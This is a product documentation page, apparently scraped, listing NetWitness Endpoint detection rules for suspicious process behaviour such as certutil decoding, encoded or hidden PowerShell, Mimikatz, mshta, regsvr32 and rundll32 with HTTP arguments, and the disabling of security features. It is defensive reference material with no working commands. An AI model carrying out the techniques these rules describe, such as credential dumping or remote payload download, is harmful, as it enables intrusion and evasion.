Runs Binary Located In Root Of Logical Driveruns_binary_located_in_root_of_logical_driveWhile the majority of programs are stored in folders on a system, it is uncommon to see a binary in the root of "C:" directory.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs binary located in root of logical drive
Runs Binary Located In Root Of Program Directoryruns_binary_located_in_root_of_program_directoryWith the ProgramData being hidden in Windows by default, the main use of this folder is for application data that is not user specific, meaning that it applies to "All Users". If malware was to be placed here, it would run on any user that would log into the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs binary located in root of program directory
Runs Binary Located In Root Of Users Directoryruns_binary_located_in_root_of_users_directoryWhile the majority of programs are stored in folders on a system, it is uncommon to see a binary in the root of a users home directory and is sometimes used by malware.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs binary located in root of users directory
Runs Binary Located In System Volume Information Directoryruns_binary_located_in_system_volume_information_directory

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs binary located in system volume information directory
Runs Blacklisted Fileruns_blacklisted_fileAn analyst may mark files as blacklisted within NetWitness Endpoint. If actions on an endpoint involve those blacklisted files as the destination process, then this rule will trigger.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs blacklisted file
Runs Certutil With Decode Argumentsruns_certutil_with_decode_argumentsWindows certificate managing utility program - CertUtil can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in Windows. Running certutil with decode argument can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs certutil with decode arguments
Runs Certutil With Encode Argumentsruns_certutil_with_encode_argumentsWindows certificate managing utility program - CertUtil can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in Windows. Running certutil with encode argument can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs certutil with encode arguments
Runs Certutil With Hashfile Argumentsruns_certutil_with_hashfile_argumentsWindows certificate managing utility program - CertUtil can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in Windows. Running certutil with hashfile argument can be an indication of someone trying to obfuscate malicious files to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs certutil with hashfile arguments
Runs Chained Command Shellruns_chained_command_shellRunning chained command shell can be an indication of someone trying to run multiple malicious commands needed to perform multi-stage attack to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs chained command shell
Runs Chmodruns_chmodChmod is used to modify file and directory permissions.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs chmod
Runs Credential Dumping Toolsruns_credential_dumping_toolsRunning credential dumping tools can be indication of someone trying to bypass all credentials checks to be able to gain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = loads credential dumping library
Runs Curlruns_curlCurl is used in command lines or scripts to transfer data via URLs.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs curl
Runs Dittoruns_dittoDitto copies files and directories from the Mac terminal.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ditto
Runs DNS Lookup Toolruns_dns_lookup_toolRunning nslookup.exe can be used to get information about the Domain Name System (DNS) being used by the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs dns lookup tool
Runs File Attributes Modification Toolruns_file_attributes_modification_toolRunning file attributes modification tool can be an indication of adversaries trying use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs file attributes modification tool
Runs File Transfer Toolruns_file_transfer_toolRunning a file transfer program can be an indication of an adversary potentially performing data exfiltration to an off site location

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs file transfer tool
Runs forfiles.exeruns_forfiles.exeRunnnig forfiles.exe can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs forfiles.exe
Runs Graylisted Fileruns_graylisted_fileAn analyst may mark files as graylisted within NetWitness Endpoint. If actions on an endpoint involve those graylisted files as the destination process, then this rule will trigger.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs graylisted file
Runs Ifconfigruns_ifconfigThe ifconfig utility is used to assign an address to a network interface or configure network interface parameters.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ifconfig
Runs Kextloadruns_kextloadThe kextload program is used to load kernel extensions (kexts). For most kexts, kextload must run as the superuser.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs kextload
Runs Kextstatruns_kextstatDisplay status of loaded kernel extensions (kexts).

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs kextstat
Runs Launchctlruns_launchctlLaunchctl is used to control services.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs launchctl
Runs Malicious File By Reputation Serviceruns_malicious_file_by_reputation_serviceFiles reported as malicious by reputation service indicates execution of files and hashes of which are tagged as malicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = runs malicious file by reputation service
Runs Mshta With HTTP Argumentruns_mshta_with_http_argumentMshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. It is suspicious for Mshta to run with an HTTP argument.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs mshta with http argument
Runs Mshta With Script Argumentruns_mshta_with_script_argumentMshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. It is suspicious for Mshta to run with a script argument.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs mshta with script argument
Runs Msiexec with HTTP Argumentruns_msiexec_with_http_argumentWindows Installer msiexec, with HTTP can be used to download and install or modify malicious applications through command line.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs msiexec with http argument
Runs Netstatruns_netstatNetstat is a network utility tool that can be used to discover network topology, statistics and performance information.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs netstat
Runs Network Configuration Toolruns_network_configuration_toolNetsh.exe is a command-line utility that will allow someone to display or change the network configuration of local or remote computer

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs network configuration tool
Runs Network Connectivity Toolruns_network_connectivity_toolRunning network connectivity tool can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs network connectivity tool
Runs One Letter Executableruns_one_letter_executableA single letter file can be a potential indicator of malware or an attacker tool. When an attacker has remote access to a machine, they want to limit the amount of typing needed and will at times name a script or program to a single letter to allow quicker access.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs one letter executable
Runs One Letter Scriptruns_one_letter_scriptA single letter file can be a potential indicator of malware or an attacker tool. When an attacker has remote access to a machine, they want to limit the amount of typing needed and will at times name a script or program to a single letter to allow quicker access.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs one letter script
Runs Pingruns_pingPing is used to see if a host is reachable on a network.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ping
Runs Powershellruns_powershellCommon cyber criminals and targeted attackers heavily use PowerShell, as its flexibility makes it an ideal attack tool for windows based systems. Running powershell can be an indication of someone trying to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs powershell
Runs Powershell Bypassing Execution Policyruns_powershell_bypassing_execution_policyRunning powershell bypassing execution policy will ignore the execution policy restrictions to run commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell bypassing execution policy
Runs Powershell Decoding Base64 Stringruns_powershell_decoding_base64_stringRunning powershell decoding base64 string can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell decoding base64 string
Runs Powershell Defining Functionruns_powershell_defining_functionRunning powershell defining functions can be an indication of someone trying to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell defining function
Runs Powershell Downloading Contentruns_powershell_downloading_contentAttackers mainly use PowerShell as a downloader on windows based systems. Running powershell downloading content can be an indication of someone trying to download malicious payloads from internet to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell downloading content
Runs Powershell Invoke-Mimikatz Functionruns_powershell_invoke-mimikatz_functionMimikatz has become an extremely effective attack tool against Windows clients. Running powershell Invoke-Mimikatz function is an indication of someone trying to use Mimikatz to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = runs powershell invoke-mimikatz function
Runs Powershell Memory Stream Functionruns_powershell_memory_stream_functionRunning powershell memory stream function can be an indication of someone trying to execute malicious I/O commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell memory stream function
Runs Powershell ShellExecute Functionruns_powershell_shellexecute_functionRunning powershell ShellExecute function can be an indication of someone trying to execute malicious shell code to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell shellexecute function
Runs Powershell Using Encoded Commandruns_powershell_using_encoded_commandRunning powershell using encoded command can be an indication of someone trying to obfuscate malicious commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell using encoded command
Runs Powershell Using Environment Variablesruns_powershell_using_environment_variablesRunning powershell using environment variables can be an indication of someone trying to run malicious commands with particular variables like path to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell using environment variables
Runs Powershell With Hidden Windowruns_powershell_with_hidden_windowRunning powershell with hidden window can be an indication of someone trying to run malicious commands in stealth mode so that powershell window is not visible to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell with hidden window
Runs Powershell With HTTP Argumentruns_powershell_with_http_argumentRunning powershell with HTTP argument can be an indication of someone trying to connect and render malicious commands/downloaders from internet, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell with http argument
Runs Powershell With Long Argumentsruns_powershell_with_long_argumentsRunning powershell with long arguments can be an indication of someone trying to run malicious powershell commands, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs powershell with long arguments
Runs Psruns_psCan be used to access process status information.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs ps
Runs PSEXEC On Remote System And Silently Accepts User Licenseruns_psexec_on_remote_system_and_silently_accepts_user_licenseRunning PSEXEC on remote system and silently accepting user license can be an indication of someone trying to execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs psexec on remote system and silently accepts user license
Runs PSEXEC On Remote System As SYSTEM Userruns_psexec_on_remote_system_as_system_userRunning PSEXEC on remote system as SYSTEM user can be an indication of someone trying to execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs psexec on remote system as system user
Runs Registry Toolruns_registry_toolRunning the registry tool can be an indication of malware changing settings, adding persistence or lowering security of a system

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs registry tool
Runs Regsvr32 COM Scripletsruns_regsvr32_com_scripletsRegsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs regsvr32 com scriplets
Runs Regsvr32 Using One Letter DLLruns_regsvr32_using_one_letter_dllRegsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. One letter DLLs are atypical and could be a signature of an attacker.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs regsvr32 using one letter dll
Runs Regsvr32 With HTTP Argumentruns_regsvr32_with_http_argumentRegsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. Regsvr32 communicating over HTTP could indicate command and control behavior.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs regsvr32 with http argument
Runs Regsvr32 Without Argumentsruns_regsvr32_without_argumentsRegsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs regsvr32 without arguments
Runs Remote Execution Toolruns_remote_execution_toolRunning remote execution tool can be an indication of someone trying to execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs remote execution tool
Runs Remote Powershell Commandruns_remote_powershell_commandRunning remote powershell command can be an indication of someone trying to run malicious powershell commands remotely, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs remote powershell command
Runs robocopy.exeruns_robocopy.exeRunning robocopy.exe can be indication of an adversary trying to use automated techniques for collecting internal data.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs robocopy.exe
Runs Rundll32 Using One Letter DLLruns_rundll32_using_one_letter_dllRundll32 program can be called to execute an arbitrary binary. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. One letter DLLs are atypical and could be a signature of an attacker.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs rundll32 using one letter dll
Runs Rundll32 With HTTP Argumentruns_rundll32_with_http_argumentRundll32 program can be called to execute an arbitrary binary. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs rundll32 with http argument
Runs Rundll32 With Javascript Argumentruns_rundll32_with_javascript_argumentRundll32 program can be called to execute an arbitrary binary. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs rundll32 with javascript argument
Runs Rundll32 Without Argumentsruns_rundll32_without_argumentsRundll32 program can be called to execute an arbitrary binary. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs rundll32 without arguments
Runs Scripting Engineruns_scripting_engineRunning scripting engine can be an indication of someone trying to run malicious commands to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs scripting engine
Runs Scripting Engine In Batch Mode Using Execution Engine Argumentruns_scripting_engine_in_batch_mode_using_execution_engine_argumentRunning scripting engine in batch mode using execution engine argument can be an indication of someone trying to run malicious commands in command-line environment to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs scripting engine in batch mode using execution engine argument
Runs Service Control Toolruns_service_control_toolRunning the SC tool will allow the creation, deletion, query of a Windows service from the command-line

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs service control tool
Runs Shruns_shUtility used to run shell scripts

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs sh
Runs Shim Database Installerruns_shim_database_installerMicrosoft Windows Application Compatibility Toolkit (ACT) enables shims to be used to provide backwards compatibility for older versions of Windows or legacy applications. Malicious actors may use shims to gain persistence or elevate privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs shim database installer
Runs Suspicious File By Reputation Serviceruns_suspicious_file_by_reputation_serviceFiles reported as suspicious by reputation service indicates execution of files and hashes of which are tagged as suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = runs suspicious file by reputation service
Runs Tarruns_tarIndicates a tar archive is being created.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs tar
Runs Tasks Management Toolruns_tasks_management_toolRunning at.exe or schtask.exe allows a script, program or command to be executed at a specific date and time.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs tasks management tool
Runs Unzipruns_unzipAn archive file is being extracted with unzip tool.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs unzip
Runs waitfor.exeruns_waitfor.exeRunning waitfor.exe can be indication of someone trying to compromise the integrity of the security solution by adding unexpected dealys, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs waitfor.exe
Runs WMI Command-Line Toolruns_wmi_command-line_toolWMIC.exe provides command-line interface that interacts with WMI (Windows Management Instrumentation)

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs wmi command-line tool
Runs WMI Scripting Engineruns_wmi_scripting_engineWindows Management Instrumentation (WMI) is used to access management information in an enterprise environment for both local and remote systems.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = runs wmi scripting engine
Runs xcopy.exeruns_xcopy.exeRunning xcopy.exe can be indication of an adversary trying to use automated techniques for collecting internal data.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs xcopy.exe
Safari Fraud Website Warning Disabledsafari_fraud_website_warning_disabledSafari warns you if the site you're visiting is a suspected phishing website. Disabling this setting may put your personal information at risk as you would lose visibility into sites masquerading as legitimate ones.
Scripting Addition In Processscripting_addition_in_processA scripting addition is a code library, loaded by the AppleScript scripting component instance, that implements vocabulary extending the AppleScript language. On Mac OS X the supplied osaxen live in /System/Library/ScriptingAdditions; the user may add osaxen to /Library/ScriptingAdditions or to ~/Library/ScriptingAdditions, according to the domain of their desired availability.
Scripting Engine Injects Remote Processscripting_engine_injects_remote_processScripting engine injecting remote process can be an indication of someone trying to create and run malicious processes to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = scripting engine injects remote process
Scripting Engine Runs Powershellscripting_engine_runs_powershellCommon cyber criminals and targeted attackers heavily use PowerShell, as its flexibility makes it an ideal attack tool for windows based systems. Scripting engine Running powershell can be an indication of someone trying to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = scripting engine runs powershell
Scripting Engine Runs Regsvr32scripting_engine_runs_regsvr32Regsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Scripting engine runs regsvr32 can be an indication of someone trying to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = scripting engine runs regsvr32
Scripting Engine Runs Rundll32scripting_engine_runs_rundll32Scripting engine running rundll32 process can be an indication of someone trying to run malicious DLLs and placing its libraries in the memory to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = scripting engine runs rundll32
Self Signedself_signedA self-signed certificate is one signed with its own private key. This is atypical since a digital signature generally would be received from a certificate authority (CA).

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = self signed
Services In ProgramData Directoryservices_in_programdata_directoryServices running out of a hidden directory indicates defense measures to hide malicious execution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = services in programdata directory
Services Runs Command Shellservices_runs_command_shellServices running command shell can be an indication of someone trying to create and run malicious processes to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = services runs command shell
Smartscreen Filter Disabledsmartscreen_filter_disabledDisabling smartscreen filter can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = smartscreen filter disabled
Starts Local Servicestarts_local_serviceStarting local service can be an indication of someone trying to create and run malicious services to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = starts local service
Starts RDP Servicestarts_rdp_serviceStarting RDP service can be indication of adversaries trying to connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence or perform RDP session hijacking which involves stealing a legitimate user's remote session.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = starts rdp service
Starts Remote Servicestarts_remote_serviceStarting remote service can be an indication of someone trying to execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = starts remote service
Stops Error Reporting Servicestops_error_reporting_serviceStopping error reporting service can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = stops error reporting service
